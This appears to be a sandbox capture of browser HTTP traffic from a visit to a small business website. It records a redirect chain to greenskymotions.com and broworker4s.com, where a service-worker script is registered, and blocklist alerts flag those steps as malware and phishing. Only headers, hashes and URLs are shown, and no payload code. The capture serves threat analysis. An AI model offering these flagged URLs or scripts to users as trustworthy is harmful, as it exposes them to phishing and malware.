--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   5681
Md5:    43309032a892c486f9985ef520df696e
Sha1:   36f4682ca6a33ff80ee02129c77e6f27e996ede0
Sha256: 24225ff504f30405d9ec3feb2555c738fcca0d6b265f285aa9c73a64c78a496e
                                        
                                            GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F3af2e495-85ff-410f-8418-e683c7f84bcd.jpeg HTTP/1.1 
Host: img-getpocket.cdn.mozilla.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: null
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         34.120.237.76
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
content-length: 7728
x-amzn-requestid: 9f37e7a6-1f00-4a81-9b14-962fd0b6cdf4
x-xss-protection: 1; mode=block
access-control-allow-origin: *
strict-transport-security: max-age=63072000; includeSubdomains; preload
x-frame-options: DENY
content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none'
x-amz-apigw-id: clsAMEJxoAMFchQ=
x-content-type-options: nosniff
x-amzn-trace-id: Root=1-638bc067-4a4cce217327b44525ea1e98;Sampled=0
x-amzn-remapped-date: Sat, 03 Dec 2022 21:32:23 GMT
x-amz-cf-pop: HIO50-C1, SEA19-C2
x-cache: Hit from cloudfront
x-amz-cf-id: ztC4S0WeA3ft_9JafrL6fInXo4jwkb0cTWUx4Z8L2uz3EWQS-d6F5A==
via: 1.1 112c6b3f9aea37a6cb00b7d933e5af6e.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google
date: Sat, 03 Dec 2022 22:02:47 GMT
age: 56991
etag: "9f80bb7ca6f699d88eaec2248dec508c589fe994"
cache-control: max-age=3600,public,public
alt-svc: clear
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data
Size:   7728
Md5:    027480c06cd67621f373c6765dafee4d
Sha1:   9f80bb7ca6f699d88eaec2248dec508c589fe994
Sha256: f69a0d6bd6e79d8fa7f2f15df11237c0a8b04d45af3cd5870eeef86d18f553bf
                                        
                                            GET /go.php?id=9677-22-5680954-11 HTTP/1.1 
Host: away.cdnbestplatform.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

                                         91.211.91.104
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx
date: Sun, 04 Dec 2022 13:52:39 GMT
content-length: 410
vary: Accept-Encoding
content-encoding: gzip
strict-transport-security: max-age=15768000;
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, ASCII text, with CRLF line terminators
Size:   410
Md5:    872cdcc5c755ea55143788a9c61cf136
Sha1:   492c2c91952914f0cedaa22d410981b8fb9b27f6
Sha256: 63af39d037d9663149d6e820ec45cede1f26406260b35a4ed8dfcce6a95ebf20

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "29BA772027D2ECA99C13463843102C1EC88F5A724DA8129084819F0D36974B29"
Last-Modified: Sun, 04 Dec 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16494
Expires: Sun, 04 Dec 2022 18:27:33 GMT
Date: Sun, 04 Dec 2022 13:52:39 GMT
Connection: keep-alive

                                        
GET /b91698fd2.js HTTP/1.1
Host: greenskymotions.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Service-Worker: script
Connection: keep-alive
Cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656
Sec-Fetch-Dest: serviceworker
Sec-Fetch-Mode: same-origin
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

185.177.94.152
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
server: nginx
date: Sun, 04 Dec 2022 13:52:39 GMT
content-length: 56
last-modified: Thu, 13 Oct 2022 01:01:02 GMT
etag: "6347634e-38"
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   56
Md5:    01fedb484c76c86eb5bafcc15b97bddc
Sha1:   aa3d7fba2de0e16f69798d6dc6e77d2765a90455
Sha256: 93f23f64c6e14a7778241254ad90d49a38dfe406afdd5e0e223064613572d40f

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /favicon.ico HTTP/1.1
Host: greenskymotions.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://greenskymotions.com/go/mu4genjugq5dcmjrhe3a?sub2=dfastspeed15
Cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

185.177.94.152
HTTP/2 204 No Content
server: nginx
date: Sun, 04 Dec 2022 13:52:39 GMT
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2

                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "6CB8FDB3F519B71EA5B3059FB001D9FD05C1D1E1F563262880E72EF7CF447602"
Last-Modified: Fri, 02 Dec 2022 11:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5385
Expires: Sun, 04 Dec 2022 15:22:25 GMT
Date: Sun, 04 Dec 2022 13:52:40 GMT
Connection: keep-alive

                                        
GET /b91698fd2.js HTTP/1.1
Host: 0.greenskymotions.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Service-Worker: script
Connection: keep-alive
Cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656; uuid=7d6873aa-840c-4786-92e7-c992d53d5656
Sec-Fetch-Dest: serviceworker
Sec-Fetch-Mode: same-origin
Sec-Fetch-Site: same-origin
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

185.177.94.152
HTTP/2 200 OK
content-type: application/javascript; charset=utf-8
server: nginx
date: Sun, 04 Dec 2022 13:52:40 GMT
content-length: 56
last-modified: Thu, 13 Oct 2022 01:01:02 GMT
etag: "6347634e-38"
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with no line terminators
Size:   56
Md5:    01fedb484c76c86eb5bafcc15b97bddc
Sha1:   aa3d7fba2de0e16f69798d6dc6e77d2765a90455
Sha256: 93f23f64c6e14a7778241254ad90d49a38dfe406afdd5e0e223064613572d40f

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /index.php?p=mu4genjugq5dcmjrhe3a&sub2=dfastspeed15 HTTP/1.1
Host: 0.greenskymotions.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://greenskymotions.com/
Cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
TE: trailers

185.177.94.152
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx
date: Sun, 04 Dec 2022 13:52:40 GMT
access-control-allow-origin: *
set-cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656; expires=Tue, 03-Jan-2023 13:52:40 GMT; Max-Age=2592000; path=/; domain=0.greenskymotions.com
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document, Unicode text, UTF-8 text, with very long lines (29334)
Size:   53131
Md5:    783554dd86dab3f3d3285d9476c0b2cb
Sha1:   9bb4b4baa7bd6607dc334509651182a877627688
Sha256: 966550e6a5f6664a616f54ccbc88d5806c03b133974acbacedad3b5507de5437
                                        
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Server: nginx
Content-Length: 503
ETag: "25253026EDA6A5F18BC94EB9B840F7231E0234578DE06651ADDB296C80B69E8E"
Last-Modified: Sat, 03 Dec 2022 21:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=8059
Expires: Sun, 04 Dec 2022 16:06:59 GMT
Date: Sun, 04 Dec 2022 13:52:40 GMT
Connection: keep-alive

                                        
GET /go/mu4genjugq5dcmjrhe3a?sub2=dfastspeed15 HTTP/1.1
Host: greenskymotions.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://away.cdnbestplatform.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

185.177.94.152
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx
date: Sun, 04 Dec 2022 13:52:39 GMT
access-control-allow-origin: *
set-cookie: uuid=7d6873aa-840c-4786-92e7-c992d53d5656; expires=Tue, 03-Jan-2023 13:52:39 GMT; Max-Age=2592000; path=/; domain=greenskymotions.com
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (7734)
Size:   18181
Md5:    e0a7c65966c02ff5464fe93e6ca3aab6
Sha1:   9bd4b706969fa8413f408704c5ad51318b58cd31
Sha256: 3147bdbd0a86eff046f06fd21ec65ae2a62fbe90e8f51eb9cf539c7002e87ac7

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /css?family=Ubuntu:400%2C500%7CPlay:700 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

142.250.74.74
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Sun, 04 Dec 2022 13:52:37 GMT
date: Sun, 04 Dec 2022 13:52:37 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /wp-content/plugins/revslider/public/assets/js/jquery.themepunch.tools.min.js?ver=5.4.6.3.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:37 GMT
last-modified: Sat, 19 Nov 2022 18:21:34 GMT
accept-ranges: bytes
content-encoding: br
vary: Accept-Encoding
content-length: 39054
date: Sun, 04 Dec 2022 13:52:37 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /sw/bro.js HTTP/1.1
Host: broworker4s.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://greenskymotions.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache

51.15.18.159
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
server: nginx
date: Sun, 04 Dec 2022 13:52:40 GMT
access-control-allow-origin: *
expires: Mon, 04 Dec 2023 13:52:40 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /sw/bro.js HTTP/1.1
Host: broworker4s.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0.greenskymotions.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

51.15.18.159
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
server: nginx
date: Sun, 04 Dec 2022 13:52:40 GMT
access-control-allow-origin: *
expires: Mon, 04 Dec 2023 13:52:40 GMT
cache-control: max-age=31536000
strict-transport-security: max-age=31536000
content-security-policy: img-src https: data:; upgrade-insecure-requests
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1
Host: triumphinvestigativeservicesllc.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Cookie: vchideactivationmsg_vc11=12.0
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

162.213.255.27
HTTP/2 200 OK
content-type: application/javascript
cache-control: public, max-age=604800
expires: Sun, 11 Dec 2022 13:52:33 GMT
last-modified: Fri, 04 Nov 2022 18:25:28 GMT
accept-ranges: bytes
content-encoding: gzip
vary: Accept-Encoding
content-length: 37123
date: Sun, 04 Dec 2022 13:52:33 GMT
server: LiteSpeed
x-turbo-charged-by: LiteSpeed
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /css?family=Ubuntu:400%7CPlay:700&display=swap&ver=1641848309 HTTP/1.1
Host: fonts.googleapis.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://triumphinvestigativeservicesllc.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

142.250.74.74
HTTP/2 200 OK
content-type: text/css; charset=utf-8
access-control-allow-origin: *
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
strict-transport-security: max-age=31536000
expires: Sun, 04 Dec 2022 13:52:37 GMT
date: Sun, 04 Dec 2022 13:52:37 GMT
cache-control: private, max-age=86400
cross-origin-opener-policy: same-origin-allow-popups
cross-origin-resource-policy: cross-origin
content-encoding: gzip
server: ESF
x-xss-protection: 0
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---